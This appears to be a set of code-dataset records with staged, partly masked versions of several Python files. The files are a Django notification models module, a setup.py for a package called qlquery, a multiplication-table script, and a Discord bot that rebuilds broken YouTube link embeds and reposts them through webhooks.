return f'Sent by {str(self.sent_by)} to {str(self.sent_to)} content {self.content}'
return f'{str(self.sent_to)} content {self.content}'
class Meta:
ordering = ('is_read', '-created_at')
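# Signal receiver: when a UserNotification is created, push it to the recipient's first active device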
def send_push_notification(sender, instance, created, **kwargs):
if created:
receiver = instance.sent_to
receiver_device = receiver.devices.filter(is_active=True).first()
if receiver_device:
send_push_message(
receiver_device.registration_id,
title=instance.title,
body=instance.content
)
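# Signal receiver: when an Article is created, fan out an info notification to every user in bulk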
def send_article_notifications(sender, instance, created, **kwargs):
if created:
UserNotification.objects.bulk_create([
UserNotification(**{
'title': instance.title,
'sent_to': user,
'notification_type': INFO,
'content': instance.description
}) for user in User.objects.all()
])
post_save.connect(send_push_notification, sender=UserNotification)
post_save.connect(send_article_notifications, sender=Article)
|
normal
|
{
"blob_id": "c2260278c8dfb353f55ee9ea3495049b08169447",
"index": 4115,
"step-1": "<mask token>\n\n\nclass City(BaseModel):\n name = models.CharField(max_length=255, db_index=True)\n\n def __str__(self):\n return self.name\n\n\nclass Article(BaseModel):\n created_by = models.ForeignKey(User, related_name='articles', on_delete\n =models.SET_NULL, null=True)\n title = models.CharField(max_length=200)\n description = models.TextField()\n image = models.ImageField(upload_to=get_upload_path, blank=True)\n is_archived = models.BooleanField(default=False)\n\n def __str__(self):\n return self.title\n\n\nclass UserNotification(BaseModel):\n title = models.CharField(max_length=150)\n sent_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='sent_notifications')\n sent_to = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='notifications')\n content = models.TextField(blank=True)\n is_read = models.BooleanField(default=False)\n notification_type = models.CharField(max_length=15, choices=\n NOTIFICATION_TYPE_CHOICES, default=INFO)\n\n def __str__(self):\n if self.sent_by:\n return (\n f'Sent by {str(self.sent_by)} to {str(self.sent_to)} content {self.content}'\n )\n return f'{str(self.sent_to)} content {self.content}'\n\n\n class Meta:\n ordering = 'is_read', '-created_at'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass City(BaseModel):\n name = models.CharField(max_length=255, db_index=True)\n\n def __str__(self):\n return self.name\n\n\nclass Article(BaseModel):\n created_by = models.ForeignKey(User, related_name='articles', on_delete\n =models.SET_NULL, null=True)\n title = models.CharField(max_length=200)\n description = models.TextField()\n image = models.ImageField(upload_to=get_upload_path, blank=True)\n is_archived = models.BooleanField(default=False)\n\n def __str__(self):\n return self.title\n\n\nclass UserNotification(BaseModel):\n title = models.CharField(max_length=150)\n sent_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='sent_notifications')\n sent_to = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='notifications')\n content = models.TextField(blank=True)\n is_read = models.BooleanField(default=False)\n notification_type = models.CharField(max_length=15, choices=\n NOTIFICATION_TYPE_CHOICES, default=INFO)\n\n def __str__(self):\n if self.sent_by:\n return (\n f'Sent by {str(self.sent_by)} to {str(self.sent_to)} content {self.content}'\n )\n return f'{str(self.sent_to)} content {self.content}'\n\n\n class Meta:\n ordering = 'is_read', '-created_at'\n\n\n<mask token>\n\n\ndef send_article_notifications(sender, instance, created, **kwargs):\n if created:\n UserNotification.objects.bulk_create([UserNotification(**{'title':\n instance.title, 'sent_to': user, 'notification_type': INFO,\n 'content': instance.description}) for user in User.objects.all()])\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass City(BaseModel):\n name = models.CharField(max_length=255, db_index=True)\n\n def __str__(self):\n return self.name\n\n\nclass Article(BaseModel):\n created_by = models.ForeignKey(User, related_name='articles', on_delete\n =models.SET_NULL, null=True)\n title = models.CharField(max_length=200)\n description = models.TextField()\n image = models.ImageField(upload_to=get_upload_path, blank=True)\n is_archived = models.BooleanField(default=False)\n\n def __str__(self):\n return self.title\n\n\nclass UserNotification(BaseModel):\n title = models.CharField(max_length=150)\n sent_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='sent_notifications')\n sent_to = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='notifications')\n content = models.TextField(blank=True)\n is_read = models.BooleanField(default=False)\n notification_type = models.CharField(max_length=15, choices=\n NOTIFICATION_TYPE_CHOICES, default=INFO)\n\n def __str__(self):\n if self.sent_by:\n return (\n f'Sent by {str(self.sent_by)} to {str(self.sent_to)} content {self.content}'\n )\n return f'{str(self.sent_to)} content {self.content}'\n\n\n class Meta:\n ordering = 'is_read', '-created_at'\n\n\ndef send_push_notification(sender, instance, created, **kwargs):\n if created:\n receiver = instance.sent_to\n receiver_device = receiver.devices.filter(is_active=True).first()\n if receiver_device:\n send_push_message(receiver_device.registration_id, title=\n instance.title, body=instance.content)\n\n\ndef send_article_notifications(sender, instance, created, **kwargs):\n if created:\n UserNotification.objects.bulk_create([UserNotification(**{'title':\n instance.title, 'sent_to': user, 'notification_type': INFO,\n 'content': instance.description}) for user in User.objects.all()])\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass City(BaseModel):\n name = models.CharField(max_length=255, db_index=True)\n\n def __str__(self):\n return self.name\n\n\nclass Article(BaseModel):\n created_by = models.ForeignKey(User, related_name='articles', on_delete\n =models.SET_NULL, null=True)\n title = models.CharField(max_length=200)\n description = models.TextField()\n image = models.ImageField(upload_to=get_upload_path, blank=True)\n is_archived = models.BooleanField(default=False)\n\n def __str__(self):\n return self.title\n\n\nclass UserNotification(BaseModel):\n title = models.CharField(max_length=150)\n sent_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='sent_notifications')\n sent_to = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='notifications')\n content = models.TextField(blank=True)\n is_read = models.BooleanField(default=False)\n notification_type = models.CharField(max_length=15, choices=\n NOTIFICATION_TYPE_CHOICES, default=INFO)\n\n def __str__(self):\n if self.sent_by:\n return (\n f'Sent by {str(self.sent_by)} to {str(self.sent_to)} content {self.content}'\n )\n return f'{str(self.sent_to)} content {self.content}'\n\n\n class Meta:\n ordering = 'is_read', '-created_at'\n\n\ndef send_push_notification(sender, instance, created, **kwargs):\n if created:\n receiver = instance.sent_to\n receiver_device = receiver.devices.filter(is_active=True).first()\n if receiver_device:\n send_push_message(receiver_device.registration_id, title=\n instance.title, body=instance.content)\n\n\ndef send_article_notifications(sender, instance, created, **kwargs):\n if created:\n UserNotification.objects.bulk_create([UserNotification(**{'title':\n instance.title, 'sent_to': user, 'notification_type': INFO,\n 'content': instance.description}) for user in User.objects.all()])\n\n\npost_save.connect(send_push_notification, sender=UserNotification)\npost_save.connect(send_article_notifications, sender=Article)\n",
"step-5": "from django.contrib.auth import get_user_model\nfrom django.db import models\nfrom django.db.models.signals import post_save\n\nfrom apps.common.constants import NOTIFICATION_TYPE_CHOICES, INFO\nfrom apps.core.models import BaseModel\nfrom apps.core.utils.helpers import get_upload_path\nfrom apps.core.utils.push_notification import send_push_message\n\nUser = get_user_model()\n\n\nclass City(BaseModel):\n name = models.CharField(max_length=255, db_index=True)\n\n def __str__(self):\n return self.name\n\n\nclass Article(BaseModel):\n created_by = models.ForeignKey(User, related_name='articles', on_delete=models.SET_NULL, null=True)\n title = models.CharField(max_length=200)\n description = models.TextField()\n # Below fields are optional\n image = models.ImageField(\n upload_to=get_upload_path,\n blank=True\n )\n is_archived = models.BooleanField(default=False)\n\n def __str__(self):\n return self.title\n\n\nclass UserNotification(BaseModel):\n title = models.CharField(max_length=150)\n sent_by = models.ForeignKey(\n User, on_delete=models.SET_NULL, null=True, related_name='sent_notifications')\n sent_to = models.ForeignKey(\n User, on_delete=models.SET_NULL, null=True, related_name='notifications')\n content = models.TextField(blank=True)\n is_read = models.BooleanField(default=False) # To mark notification as read\n notification_type = models.CharField(\n max_length=15,\n choices=NOTIFICATION_TYPE_CHOICES,\n default=INFO\n )\n\n def __str__(self):\n if self.sent_by:\n return f'Sent by {str(self.sent_by)} to {str(self.sent_to)} content {self.content}'\n return f'{str(self.sent_to)} content {self.content}'\n\n class Meta:\n ordering = ('is_read', '-created_at')\n\n\ndef send_push_notification(sender, instance, created, **kwargs):\n if created:\n receiver = instance.sent_to\n receiver_device = receiver.devices.filter(is_active=True).first()\n if receiver_device:\n send_push_message(\n receiver_device.registration_id,\n title=instance.title,\n body=instance.content\n )\n\n\ndef send_article_notifications(sender, instance, created, **kwargs):\n if created:\n UserNotification.objects.bulk_create([\n UserNotification(**{\n 'title': instance.title,\n 'sent_to': user,\n 'notification_type': INFO,\n 'content': instance.description\n }) for user in User.objects.all()\n ])\n\n\npost_save.connect(send_push_notification, sender=UserNotification)\npost_save.connect(send_article_notifications, sender=Article)\n",
"step-ids": [
9,
10,
11,
12,
15
]
}
|
[
9,
10,
11,
12,
15
] |
# coding: gb18030
from setuptools import setup
setup(
name="qlquery",
version="1.0",
license="MIT",
packages=['qlquery'],
install_requires=[
'my-fake-useragent',
'requests',
'beautifulsoup4'
],
zip_safe=False
)
|
normal
|
{
"blob_id": "f11ede752df7d9aff672eee4e230b109fcbf987b",
"index": 8555,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='qlquery', version='1.0', license='MIT', packages=['qlquery'],\n install_requires=['my-fake-useragent', 'requests', 'beautifulsoup4'],\n zip_safe=False)\n",
"step-3": "from setuptools import setup\nsetup(name='qlquery', version='1.0', license='MIT', packages=['qlquery'],\n install_requires=['my-fake-useragent', 'requests', 'beautifulsoup4'],\n zip_safe=False)\n",
"step-4": "# coding: gb18030\n\nfrom setuptools import setup\n\nsetup(\n name=\"qlquery\",\n version=\"1.0\",\n license=\"MIT\",\n packages=['qlquery'],\n install_requires=[\n 'my-fake-useragent',\n 'requests',\n 'beautifulsoup4'\n ],\n zip_safe=False\n)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Author : Kevin Oswaldo Palacios Jimenez
# Created: 16/09/19
# A loop is generated with for
# print with no argument produces no change
# other than moving on to the next line
for i in range (1,11):
encabezado="Tabla del {}"
print(encabezado.format(i))
print()
    # We use a for inside another for, generating one more nested loop
for j in range(1,11):
        # where i holds the base of the table
        # and j holds the multiplier
salida="{} x {} = {}"
print(salida.format(i,j,i*j))
else:
        # once the loop has finished its iterations
        # a blank line is printed before moving on
print()
|
normal
|
{
"blob_id": "86f365612e9f15e7658160ecab1d3d9970ca364e",
"index": 9699,
"step-1": "<mask token>\n",
"step-2": "for i in range(1, 11):\n encabezado = 'Tabla del {}'\n print(encabezado.format(i))\n print()\n for j in range(1, 11):\n salida = '{} x {} = {}'\n print(salida.format(i, j, i * j))\n else:\n print()\n",
"step-3": "# Autor : Kevin Oswaldo Palacios Jimenez\r\n# Fecha de creacion: 16/09/19 \r\n\r\n# Se genera un bucle con for \r\n# al no tener argumento print no genera ningun cambio \r\n# mas que continuar a la siguiente linea\r\nfor i in range (1,11): \r\n encabezado=\"Tabla del {}\" \r\n print(encabezado.format(i))\r\n\r\n print() \r\n # Usaremos un for dentro de otro generando un bucle mas\r\n for j in range(1,11): \r\n # en donde i tendremos la base \r\n # con j tendriamos el elemento\r\n salida=\"{} x {} = {}\" \r\n print(salida.format(i,j,i*j)) \r\n else: \r\n # con el bucle teniendo su proceso iterativo \r\n # se saltaran las linea pero ejecutando el codigo \r\n print() ",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
"""
"""
import json
import logging
import re
import asyncio
from typing import Optional
import discord
from discord.ext import commands
import utils
logging.basicConfig(level=logging.INFO, format="[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s")
log = logging.getLogger("YTEmbedFixer")
client = commands.Bot(command_prefix="yt!",
max_messages=5000,
description="A bot for fixing what Discord can't.\n",
owner_id=389590659335716867,
case_insensitive=True)
@client.event
async def on_ready():
log.info('Connected using discord.py {}!'.format(discord.__version__))
log.info('Username: {0.name}, ID: {0.id}'.format(client.user))
log.info("Connected to {} servers.".format(len(client.guilds)))
activity = discord.Game("Fixing what Discord can't since 12/5/2019.".format(client.command_prefix))
await client.change_presence(status=discord.Status.online, activity=activity)
log.info('------')
async def fix_yt_embed(message: discord.Message) -> Optional[discord.Embed]:
regex_search_string = r'(?:https?://)?(?:www[.])?youtu(?:[.]be/|be[.]com/watch[?]v=)([^ ]*)'
if len(message.embeds) == 1:
matches = re.findall(regex_search_string, message.content)
if len(matches) > 0:
# We have a valid youtube link with Embed! Check if it broken.
# We are lazy and trying to get this done quickly, so for the time being ignore all other embeds other than the first one.
if message.embeds[0].type == "link": # description == 'Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube.':
# We have a broken embed!
                await asyncio.sleep(2) # Sleep for a bit to let PK delete the message if it is a proxy message
msg_check = discord.utils.get(client.cached_messages, id=message.id) # Check if message was deleted by PK.
if msg_check is not None:
html = await utils.get_video_webpage(matches[0])
video_url = "https://www.youtube.com/watch?v={}".format(matches[0])
video_image = await utils.get_video_image_url(html)
video_title = await utils.get_video_title(html)
author_name = await utils.get_author_name(html)
author_url = await utils.get_author_url(html)
if video_title is None and video_image is None and author_name is None and author_url is None:
                        # We got no info from the video. Perhaps the video is dead on YouTube or the DOM has totally changed.
return None # Don't post empty embed.
embed = build_embed(video_url, video_image, video_title, author_name, author_url)
await send_new_embed(message, embed)
return None
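# Repost via a channel webhook, impersonating the original author when the bot is allowed to delete the original message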
async def send_new_embed(original_msg: discord.Message, embed: discord.Embed):
webhook: discord.Webhook = await utils.get_webhook(client, original_msg.channel)
try:
if original_msg.guild.me.permissions_in(original_msg.channel).manage_messages:
await original_msg.delete()
await webhook.send(content=original_msg.content, embed=embed, username=original_msg.author.display_name,
avatar_url=original_msg.author.avatar_url)
else:
await webhook.send(embed=embed, username=client.user.display_name,
avatar_url=client.user.avatar_url)
except discord.errors.NotFound:
pass # SHOULD never get here because we check before deleting, but just in case... Don't post replacement.
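# Build the replacement embed from whatever video metadata could be scraped (thumbnail, title, channel)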
def build_embed(_video_url: str, _video_image_url: Optional[str], _video_title: Optional[str],
_author_name: Optional[str], _author_url: Optional[str]) -> discord.Embed:
embed = discord.Embed(type="video", colour=discord.Colour.from_rgb(255, 0, 0))
if _video_image_url is not None:
embed.set_image(url=_video_image_url)
if _author_name is not None:
if _author_url is not None:
embed.set_author(name=_author_name, url=_author_url)
else:
embed.set_author(name=_author_name)
if _video_title is not None:
embed.title = _video_title
embed.url = _video_url
return embed
# ---- Command Error Handling ----- #
@client.event
async def on_command_error(ctx, error):
if type(error) == discord.ext.commands.NoPrivateMessage:
await ctx.send("⚠ This command can not be used in DMs!!!")
return
elif type(error) == discord.ext.commands.CommandNotFound:
await ctx.send("⚠ Invalid Command!!!")
return
elif type(error) == discord.ext.commands.MissingPermissions:
await ctx.send("⚠ You need the **Manage Messages** permission to use this command".format(error.missing_perms))
return
elif type(error) == discord.ext.commands.MissingRequiredArgument:
await ctx.send("⚠ {}".format(error))
elif type(error) == discord.ext.commands.BadArgument:
await ctx.send("⚠ {}".format(error))
else:
await ctx.send("⚠ {}".format(error))
raise error
@client.event
async def on_message(message: discord.Message):
await fix_yt_embed(message)
await client.process_commands(message)
@client.event
async def on_message_edit(before: discord.Message, after: discord.Message):
await fix_yt_embed(after)
@client.command(name="invite", brief="Sends the invite link")
async def send_invite_link(ctx: commands.Context):
# link = "https://discordapp.com/oauth2/authorize?client_id=500711320497160199&scope=bot&permissions=536882176"
link = "https://discordapp.com/oauth2/authorize?client_id={}&scope=bot&permissions=536882176".format(client.user.id)
await ctx.send(link)
if __name__ == '__main__':
with open('config.json') as json_data_file:
config = json.load(json_data_file)
client.command_prefix = config['bot_prefix']
client.run(config['token'])
log.info("cleaning Up and shutting down")
|
normal
|
{
"blob_id": "d73832d3f0adf22085a207ab223854e11fffa2e8",
"index": 6948,
"step-1": "<mask token>\n\n\ndef build_embed(_video_url: str, _video_image_url: Optional[str],\n _video_title: Optional[str], _author_name: Optional[str], _author_url:\n Optional[str]) ->discord.Embed:\n embed = discord.Embed(type='video', colour=discord.Colour.from_rgb(255,\n 0, 0))\n if _video_image_url is not None:\n embed.set_image(url=_video_image_url)\n if _author_name is not None:\n if _author_url is not None:\n embed.set_author(name=_author_name, url=_author_url)\n else:\n embed.set_author(name=_author_name)\n if _video_title is not None:\n embed.title = _video_title\n embed.url = _video_url\n return embed\n\n\n<mask token>\n",
"step-2": "<mask token>\nlogging.basicConfig(level=logging.INFO, format=\n '[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')\n<mask token>\n\n\[email protected]\nasync def on_ready():\n log.info('Connected using discord.py {}!'.format(discord.__version__))\n log.info('Username: {0.name}, ID: {0.id}'.format(client.user))\n log.info('Connected to {} servers.'.format(len(client.guilds)))\n activity = discord.Game(\"Fixing what Discord can't since 12/5/2019.\".\n format(client.command_prefix))\n await client.change_presence(status=discord.Status.online, activity=\n activity)\n log.info('------')\n\n\nasync def fix_yt_embed(message: discord.Message) ->Optional[discord.Embed]:\n regex_search_string = (\n '(?:https?://)?(?:www[.])?youtu(?:[.]be/|be[.]com/watch[?]v=)([^ ]*)')\n if len(message.embeds) == 1:\n matches = re.findall(regex_search_string, message.content)\n if len(matches) > 0:\n if message.embeds[0].type == 'link':\n await asyncio.sleep(2)\n msg_check = discord.utils.get(client.cached_messages, id=\n message.id)\n if msg_check is not None:\n html = await utils.get_video_webpage(matches[0])\n video_url = 'https://www.youtube.com/watch?v={}'.format(\n matches[0])\n video_image = await utils.get_video_image_url(html)\n video_title = await utils.get_video_title(html)\n author_name = await utils.get_author_name(html)\n author_url = await utils.get_author_url(html)\n if (video_title is None and video_image is None and \n author_name is None and author_url is None):\n return None\n embed = build_embed(video_url, video_image, video_title,\n author_name, author_url)\n await send_new_embed(message, embed)\n return None\n\n\nasync def send_new_embed(original_msg: discord.Message, embed: discord.Embed):\n webhook: discord.Webhook = await utils.get_webhook(client, original_msg\n .channel)\n try:\n if original_msg.guild.me.permissions_in(original_msg.channel\n ).manage_messages:\n await original_msg.delete()\n await webhook.send(content=original_msg.content, embed=embed,\n username=original_msg.author.display_name, avatar_url=\n original_msg.author.avatar_url)\n else:\n await webhook.send(embed=embed, username=client.user.\n display_name, avatar_url=client.user.avatar_url)\n except discord.errors.NotFound:\n pass\n\n\ndef build_embed(_video_url: str, _video_image_url: Optional[str],\n _video_title: Optional[str], _author_name: Optional[str], _author_url:\n Optional[str]) ->discord.Embed:\n embed = discord.Embed(type='video', colour=discord.Colour.from_rgb(255,\n 0, 0))\n if _video_image_url is not None:\n embed.set_image(url=_video_image_url)\n if _author_name is not None:\n if _author_url is not None:\n embed.set_author(name=_author_name, url=_author_url)\n else:\n embed.set_author(name=_author_name)\n if _video_title is not None:\n embed.title = _video_title\n embed.url = _video_url\n return embed\n\n\[email protected]\nasync def on_command_error(ctx, error):\n if type(error) == discord.ext.commands.NoPrivateMessage:\n await ctx.send('⚠ This command can not be used in DMs!!!')\n return\n elif type(error) == discord.ext.commands.CommandNotFound:\n await ctx.send('⚠ Invalid Command!!!')\n return\n elif type(error) == discord.ext.commands.MissingPermissions:\n await ctx.send(\n '⚠ You need the **Manage Messages** permission to use this command'\n .format(error.missing_perms))\n return\n elif type(error) == discord.ext.commands.MissingRequiredArgument:\n await ctx.send('⚠ {}'.format(error))\n elif type(error) == discord.ext.commands.BadArgument:\n await ctx.send('⚠ {}'.format(error))\n else:\n 
await ctx.send('⚠ {}'.format(error))\n raise error\n\n\[email protected]\nasync def on_message(message: discord.Message):\n await fix_yt_embed(message)\n await client.process_commands(message)\n\n\[email protected]\nasync def on_message_edit(before: discord.Message, after: discord.Message):\n await fix_yt_embed(after)\n\n\[email protected](name='invite', brief='Sends the invite link')\nasync def send_invite_link(ctx: commands.Context):\n link = (\n 'https://discordapp.com/oauth2/authorize?client_id={}&scope=bot&permissions=536882176'\n .format(client.user.id))\n await ctx.send(link)\n\n\nif __name__ == '__main__':\n with open('config.json') as json_data_file:\n config = json.load(json_data_file)\n client.command_prefix = config['bot_prefix']\n client.run(config['token'])\n log.info('cleaning Up and shutting down')\n",
"step-3": "<mask token>\nlogging.basicConfig(level=logging.INFO, format=\n '[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')\nlog = logging.getLogger('YTEmbedFixer')\nclient = commands.Bot(command_prefix='yt!', max_messages=5000, description=\n \"\"\"A bot for fixing what Discord can't.\n\"\"\", owner_id=\n 389590659335716867, case_insensitive=True)\n\n\[email protected]\nasync def on_ready():\n log.info('Connected using discord.py {}!'.format(discord.__version__))\n log.info('Username: {0.name}, ID: {0.id}'.format(client.user))\n log.info('Connected to {} servers.'.format(len(client.guilds)))\n activity = discord.Game(\"Fixing what Discord can't since 12/5/2019.\".\n format(client.command_prefix))\n await client.change_presence(status=discord.Status.online, activity=\n activity)\n log.info('------')\n\n\nasync def fix_yt_embed(message: discord.Message) ->Optional[discord.Embed]:\n regex_search_string = (\n '(?:https?://)?(?:www[.])?youtu(?:[.]be/|be[.]com/watch[?]v=)([^ ]*)')\n if len(message.embeds) == 1:\n matches = re.findall(regex_search_string, message.content)\n if len(matches) > 0:\n if message.embeds[0].type == 'link':\n await asyncio.sleep(2)\n msg_check = discord.utils.get(client.cached_messages, id=\n message.id)\n if msg_check is not None:\n html = await utils.get_video_webpage(matches[0])\n video_url = 'https://www.youtube.com/watch?v={}'.format(\n matches[0])\n video_image = await utils.get_video_image_url(html)\n video_title = await utils.get_video_title(html)\n author_name = await utils.get_author_name(html)\n author_url = await utils.get_author_url(html)\n if (video_title is None and video_image is None and \n author_name is None and author_url is None):\n return None\n embed = build_embed(video_url, video_image, video_title,\n author_name, author_url)\n await send_new_embed(message, embed)\n return None\n\n\nasync def send_new_embed(original_msg: discord.Message, embed: discord.Embed):\n webhook: discord.Webhook = await utils.get_webhook(client, original_msg\n .channel)\n try:\n if original_msg.guild.me.permissions_in(original_msg.channel\n ).manage_messages:\n await original_msg.delete()\n await webhook.send(content=original_msg.content, embed=embed,\n username=original_msg.author.display_name, avatar_url=\n original_msg.author.avatar_url)\n else:\n await webhook.send(embed=embed, username=client.user.\n display_name, avatar_url=client.user.avatar_url)\n except discord.errors.NotFound:\n pass\n\n\ndef build_embed(_video_url: str, _video_image_url: Optional[str],\n _video_title: Optional[str], _author_name: Optional[str], _author_url:\n Optional[str]) ->discord.Embed:\n embed = discord.Embed(type='video', colour=discord.Colour.from_rgb(255,\n 0, 0))\n if _video_image_url is not None:\n embed.set_image(url=_video_image_url)\n if _author_name is not None:\n if _author_url is not None:\n embed.set_author(name=_author_name, url=_author_url)\n else:\n embed.set_author(name=_author_name)\n if _video_title is not None:\n embed.title = _video_title\n embed.url = _video_url\n return embed\n\n\[email protected]\nasync def on_command_error(ctx, error):\n if type(error) == discord.ext.commands.NoPrivateMessage:\n await ctx.send('⚠ This command can not be used in DMs!!!')\n return\n elif type(error) == discord.ext.commands.CommandNotFound:\n await ctx.send('⚠ Invalid Command!!!')\n return\n elif type(error) == discord.ext.commands.MissingPermissions:\n await ctx.send(\n '⚠ You need the **Manage Messages** permission to use this command'\n .format(error.missing_perms))\n 
return\n elif type(error) == discord.ext.commands.MissingRequiredArgument:\n await ctx.send('⚠ {}'.format(error))\n elif type(error) == discord.ext.commands.BadArgument:\n await ctx.send('⚠ {}'.format(error))\n else:\n await ctx.send('⚠ {}'.format(error))\n raise error\n\n\[email protected]\nasync def on_message(message: discord.Message):\n await fix_yt_embed(message)\n await client.process_commands(message)\n\n\[email protected]\nasync def on_message_edit(before: discord.Message, after: discord.Message):\n await fix_yt_embed(after)\n\n\[email protected](name='invite', brief='Sends the invite link')\nasync def send_invite_link(ctx: commands.Context):\n link = (\n 'https://discordapp.com/oauth2/authorize?client_id={}&scope=bot&permissions=536882176'\n .format(client.user.id))\n await ctx.send(link)\n\n\nif __name__ == '__main__':\n with open('config.json') as json_data_file:\n config = json.load(json_data_file)\n client.command_prefix = config['bot_prefix']\n client.run(config['token'])\n log.info('cleaning Up and shutting down')\n",
"step-4": "<mask token>\nimport json\nimport logging\nimport re\nimport asyncio\nfrom typing import Optional\nimport discord\nfrom discord.ext import commands\nimport utils\nlogging.basicConfig(level=logging.INFO, format=\n '[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')\nlog = logging.getLogger('YTEmbedFixer')\nclient = commands.Bot(command_prefix='yt!', max_messages=5000, description=\n \"\"\"A bot for fixing what Discord can't.\n\"\"\", owner_id=\n 389590659335716867, case_insensitive=True)\n\n\[email protected]\nasync def on_ready():\n log.info('Connected using discord.py {}!'.format(discord.__version__))\n log.info('Username: {0.name}, ID: {0.id}'.format(client.user))\n log.info('Connected to {} servers.'.format(len(client.guilds)))\n activity = discord.Game(\"Fixing what Discord can't since 12/5/2019.\".\n format(client.command_prefix))\n await client.change_presence(status=discord.Status.online, activity=\n activity)\n log.info('------')\n\n\nasync def fix_yt_embed(message: discord.Message) ->Optional[discord.Embed]:\n regex_search_string = (\n '(?:https?://)?(?:www[.])?youtu(?:[.]be/|be[.]com/watch[?]v=)([^ ]*)')\n if len(message.embeds) == 1:\n matches = re.findall(regex_search_string, message.content)\n if len(matches) > 0:\n if message.embeds[0].type == 'link':\n await asyncio.sleep(2)\n msg_check = discord.utils.get(client.cached_messages, id=\n message.id)\n if msg_check is not None:\n html = await utils.get_video_webpage(matches[0])\n video_url = 'https://www.youtube.com/watch?v={}'.format(\n matches[0])\n video_image = await utils.get_video_image_url(html)\n video_title = await utils.get_video_title(html)\n author_name = await utils.get_author_name(html)\n author_url = await utils.get_author_url(html)\n if (video_title is None and video_image is None and \n author_name is None and author_url is None):\n return None\n embed = build_embed(video_url, video_image, video_title,\n author_name, author_url)\n await send_new_embed(message, embed)\n return None\n\n\nasync def send_new_embed(original_msg: discord.Message, embed: discord.Embed):\n webhook: discord.Webhook = await utils.get_webhook(client, original_msg\n .channel)\n try:\n if original_msg.guild.me.permissions_in(original_msg.channel\n ).manage_messages:\n await original_msg.delete()\n await webhook.send(content=original_msg.content, embed=embed,\n username=original_msg.author.display_name, avatar_url=\n original_msg.author.avatar_url)\n else:\n await webhook.send(embed=embed, username=client.user.\n display_name, avatar_url=client.user.avatar_url)\n except discord.errors.NotFound:\n pass\n\n\ndef build_embed(_video_url: str, _video_image_url: Optional[str],\n _video_title: Optional[str], _author_name: Optional[str], _author_url:\n Optional[str]) ->discord.Embed:\n embed = discord.Embed(type='video', colour=discord.Colour.from_rgb(255,\n 0, 0))\n if _video_image_url is not None:\n embed.set_image(url=_video_image_url)\n if _author_name is not None:\n if _author_url is not None:\n embed.set_author(name=_author_name, url=_author_url)\n else:\n embed.set_author(name=_author_name)\n if _video_title is not None:\n embed.title = _video_title\n embed.url = _video_url\n return embed\n\n\[email protected]\nasync def on_command_error(ctx, error):\n if type(error) == discord.ext.commands.NoPrivateMessage:\n await ctx.send('⚠ This command can not be used in DMs!!!')\n return\n elif type(error) == discord.ext.commands.CommandNotFound:\n await ctx.send('⚠ Invalid Command!!!')\n return\n elif type(error) == 
discord.ext.commands.MissingPermissions:\n await ctx.send(\n '⚠ You need the **Manage Messages** permission to use this command'\n .format(error.missing_perms))\n return\n elif type(error) == discord.ext.commands.MissingRequiredArgument:\n await ctx.send('⚠ {}'.format(error))\n elif type(error) == discord.ext.commands.BadArgument:\n await ctx.send('⚠ {}'.format(error))\n else:\n await ctx.send('⚠ {}'.format(error))\n raise error\n\n\[email protected]\nasync def on_message(message: discord.Message):\n await fix_yt_embed(message)\n await client.process_commands(message)\n\n\[email protected]\nasync def on_message_edit(before: discord.Message, after: discord.Message):\n await fix_yt_embed(after)\n\n\[email protected](name='invite', brief='Sends the invite link')\nasync def send_invite_link(ctx: commands.Context):\n link = (\n 'https://discordapp.com/oauth2/authorize?client_id={}&scope=bot&permissions=536882176'\n .format(client.user.id))\n await ctx.send(link)\n\n\nif __name__ == '__main__':\n with open('config.json') as json_data_file:\n config = json.load(json_data_file)\n client.command_prefix = config['bot_prefix']\n client.run(config['token'])\n log.info('cleaning Up and shutting down')\n",
"step-5": "\"\"\"\n\n\"\"\"\n\nimport json\nimport logging\nimport re\nimport asyncio\nfrom typing import Optional\n\nimport discord\nfrom discord.ext import commands\nimport utils\n\n\nlogging.basicConfig(level=logging.INFO, format=\"[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s\")\nlog = logging.getLogger(\"YTEmbedFixer\")\n\n\nclient = commands.Bot(command_prefix=\"yt!\",\n max_messages=5000,\n description=\"A bot for fixing what Discord can't.\\n\",\n owner_id=389590659335716867,\n case_insensitive=True)\n\n\[email protected]\nasync def on_ready():\n log.info('Connected using discord.py {}!'.format(discord.__version__))\n log.info('Username: {0.name}, ID: {0.id}'.format(client.user))\n log.info(\"Connected to {} servers.\".format(len(client.guilds)))\n activity = discord.Game(\"Fixing what Discord can't since 12/5/2019.\".format(client.command_prefix))\n await client.change_presence(status=discord.Status.online, activity=activity)\n\n log.info('------')\n\n\nasync def fix_yt_embed(message: discord.Message) -> Optional[discord.Embed]:\n regex_search_string = r'(?:https?://)?(?:www[.])?youtu(?:[.]be/|be[.]com/watch[?]v=)([^ ]*)'\n if len(message.embeds) == 1:\n matches = re.findall(regex_search_string, message.content)\n if len(matches) > 0:\n # We have a valid youtube link with Embed! Check if it broken.\n # We are lazy and trying to get this done quickly, so for the time being ignore all other embeds other than the first one.\n if message.embeds[0].type == \"link\": # description == 'Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube.':\n # We have a broken embed!\n\n await asyncio.sleep(2) # Sleep for a bit to let PK delete the message if it a proxy message\n\n msg_check = discord.utils.get(client.cached_messages, id=message.id) # Check if message was deleted by PK.\n if msg_check is not None:\n\n html = await utils.get_video_webpage(matches[0])\n\n video_url = \"https://www.youtube.com/watch?v={}\".format(matches[0])\n\n video_image = await 